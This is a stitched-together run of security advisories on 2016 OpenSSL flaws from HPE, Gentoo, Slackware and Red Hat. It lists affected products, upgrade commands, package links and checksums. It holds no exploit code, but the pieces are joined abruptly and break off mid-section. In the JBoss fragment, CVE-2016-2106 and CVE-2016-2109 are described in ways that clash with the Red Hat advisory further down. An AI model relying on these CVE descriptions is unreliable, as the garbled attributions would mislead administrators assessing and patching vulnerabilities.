Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5900/5920 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR1000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR2000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR3000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR4000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + VSR (Comware 7) - Version: E0324\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7900 (Comware 7) - Version: R2152\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130 (Comware 7) - Version: R3115\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6125XLG - Version: R2422P02\n * HP Network Products\n - 711307-B21 HP 6125XLG Blade Switch\n - 737230-B21 HP 6125XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6127XLG - Version: R2422P02\n * HP Network Products\n - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n - 787635-B22 HP 6127XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + Moonshot - Version: R2432\n * HP Network Products\n - 786617-B21 - HP Moonshot-45Gc Switch Module\n - 704654-B21 - HP Moonshot-45XGc Switch Module\n - 786619-B21 - HP Moonshot-180XGc Switch Module\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5700 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5930 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 1950 (Comware 7) - Version: R3115\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7500 (Comware 7) - Version: R7184\n * HP Network Products\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5510HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5940 - Version: R2509\n * HP Network Products\n - JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch\n - JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch\n - JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch\n - JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch\n - JH396A HPE FlexFabric 5940 32QSFP+ Switch\n - JH397A HPE FlexFabric 5940 2-slot Switch\n - JH398A HPE FlexFabric 5940 4-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5950 - Version: R6123\n * HP Network Products\n - JH321A HPE FlexFabric 5950 32QSFP28 Switch\n - JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch\n - JH404A HPE FlexFabric 5950 4-slot Switch\n + 12900E (Comware 7) - Version: R2609\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**iMC Products**\n\n + iNode PC 7.2 (E0410) - Version: 7.2 E0410\n * HP Network Products\n - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JD435A HP A-IMC Endpoint Admission Defense Client Software\n - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n + iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409\n * HP Network Products\n - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**VCX Products**\n\n + VCX - Version: 9.8.19\n * HP Network Products\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 2 June 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-16\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #581234, #585142, #585276, #591454, #592068, #592074,\n #592082, #594500, #595186\n ID: 201612-16\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nallows attackers to conduct a time based side-channel attack. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2j \u003e= 1.0.2j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers and the International Association for Cryptologic\nResearch\u0027s (IACR) paper, \"Make Sure DSA Signing Exponentiations Really\nare Constant-Time\" for further details. Additionally, a time based side-channel\nattack may allow a local attacker to recover a private DSA key. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2j\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-2105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105\n[ 2 ] CVE-2016-2106\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106\n[ 3 ] CVE-2016-2107\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107\n[ 4 ] CVE-2016-2108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108\n[ 5 ] CVE-2016-2109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109\n[ 6 ] CVE-2016-2176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176\n[ 7 ] CVE-2016-2177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177\n[ 8 ] CVE-2016-2178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178\n[ 9 ] CVE-2016-2180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180\n[ 10 ] CVE-2016-2183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183\n[ 11 ] CVE-2016-6304\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304\n[ 12 ] CVE-2016-6305\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305\n[ 13 ] CVE-2016-6306\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306\n[ 14 ] CVE-2016-7052\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052\n[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time\n http://eprint.iacr.org/2016/594.pdf\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-16\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1t-i486-1_slack14.1.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1t-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1t-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1t-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2h-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2h-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2h-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2h-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\n033bd9509aeb07712e6bb3adf89c18e4 openssl-1.0.1t-i486-1_slack14.0.txz\n9e91d781e33f7af80cbad08b245e84ed openssl-solibs-1.0.1t-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\ne5c77ec16e3f2fcb2f1d53d84a6ba951 openssl-1.0.1t-x86_64-1_slack14.0.txz\n2de7b6196a905233036d7f38008984bd openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n96dcae05ae2f585c30de852a55eb870f openssl-1.0.1t-i486-1_slack14.1.txz\n59618b061e62fd9d73ba17df7626b2e7 openssl-solibs-1.0.1t-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n3d5ebfce099917703d537ab603e58a9b openssl-1.0.1t-x86_64-1_slack14.1.txz\nbf3a6bbdbe835dd2ce73333822cc9f06 openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n4889a10c5f3aa7104167c7d50eedf7ea a/openssl-solibs-1.0.2h-i586-1.txz\n8e3439f35c3cb4e11ca64eebb238a52f n/openssl-1.0.2h-i586-1.txz\n\nSlackware x86_64 -current packages:\nb4a852bb7e86389ec228288ccb7e79bb a/openssl-solibs-1.0.2h-x86_64-1.txz\nbcf9dc7bb04173f002644e3ce33ab4ab n/openssl-1.0.2h-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1t-i486-1_slack14.1.txz openssl-solibs-1.0.1t-i486-1_slack14.1.txz \n\nThen, reboot the machine or restart any network services that use OpenSSL. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. Description:\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7. \n\nThis release includes bug fixes and enhancements, as well as a new release\nof OpenSSL that addresses a number of outstanding security flaws. For\nfurther information, see the knowledge base article linked to in the\nReferences section. The JBoss server process must be restarted for the update\nto take effect. \n(CVE-2016-2108)\n\n* Multiple flaws were found in the way httpd parsed HTTP requests and\nresponses using chunked transfer encoding. A remote attacker could use\nthese flaws to create a specially crafted request, which httpd would decode\ndifferently from an HTTP proxy software in front of it, possibly leading to\nHTTP request smuggling attacks. (CVE-2015-3195)\n\n* A flaw was found in the way the TLS protocol composes the Diffie-Hellman\nexchange (for both export and non-export grade cipher suites). An attacker\ncould use this flaw to downgrade a DHE connection to use export-grade key\nsizes, which could then be broken by sufficient pre-computation. This can\nlead to a passive man-in-the-middle attack in which the attacker is able to\ndecrypt all traffic. (CVE-2016-2106)\n\n* It was discovered that it is possible to remotely Segfault Apache http\nserver with a specially crafted string sent to the mod_cluster via service\nmessages (MCMP). (CVE-2016-2109)\n\n* It was discovered that specifying configuration with a JVMRoute path\nlonger than 80 characters will cause segmentation fault leading to a server\ncrash. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:0722-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0722.html\nIssue date: 2016-05-09\nCVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 \n CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 \n CVE-2016-2842 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* A flaw was found in the way OpenSSL encoded certain ASN.1 data\nstructures. An attacker could use this flaw to create a specially crafted\ncertificate which, when verified or re-encoded by OpenSSL, could cause it\nto crash, or execute arbitrary code using the permissions of the user\nrunning an application compiled against the OpenSSL library. \n(CVE-2016-2108)\n\n* Two integer overflow flaws, leading to buffer overflows, were found in\nthe way the EVP_EncodeUpdate() and EVP_EncryptUpdate() functions of OpenSSL\nparsed very large amounts of input data. \n(CVE-2016-2105, CVE-2016-2106)\n\n* It was discovered that OpenSSL leaked timing information when decrypting\nTLS/SSL and DTLS protocol encrypted records when the connection used the\nAES CBC cipher suite and the server supported AES-NI. A remote attacker\ncould possibly use this flaw to retrieve plain text from encrypted packets\nby using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)\n\n* Several flaws were found in the way BIO_*printf functions were\nimplemented in OpenSSL. Applications which passed large amounts of\nuntrusted data through these functions could crash or potentially execute\ncode with the permissions of the user running such an application. \n(CVE-2016-0799, CVE-2016-2842)\n\n* A denial of service flaw was found in the way OpenSSL parsed certain\nASN.1-encoded data from BIO (OpenSSL\u0027s I/O abstraction) inputs. An\napplication using OpenSSL that accepts untrusted ASN.1 BIO input could be\nforced to allocate an excessive amount of data. (CVE-2016-2109)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107,\nand CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat),\nHanno B\u00f6ck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842,\nCVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as\nthe original reporter of CVE-2016-2107. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions\n1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds\n1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data\n1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder\n1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 